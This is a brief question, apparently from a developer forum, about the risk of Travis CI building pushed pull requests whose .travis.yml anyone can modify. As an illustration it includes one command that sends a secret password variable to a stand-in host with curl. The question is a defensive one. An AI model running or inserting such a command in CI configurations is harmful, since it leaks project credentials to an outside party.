If we enable Build pushed pull requests, PRs will trigger builds.
Anyone can modify .travis.yml
file in a PR, that means if Build pushed pull requests
is turned on, the attackers can do anything in CI.
Such as:
curl http://example.com/xxx?v=$password
How to get rid of this risk?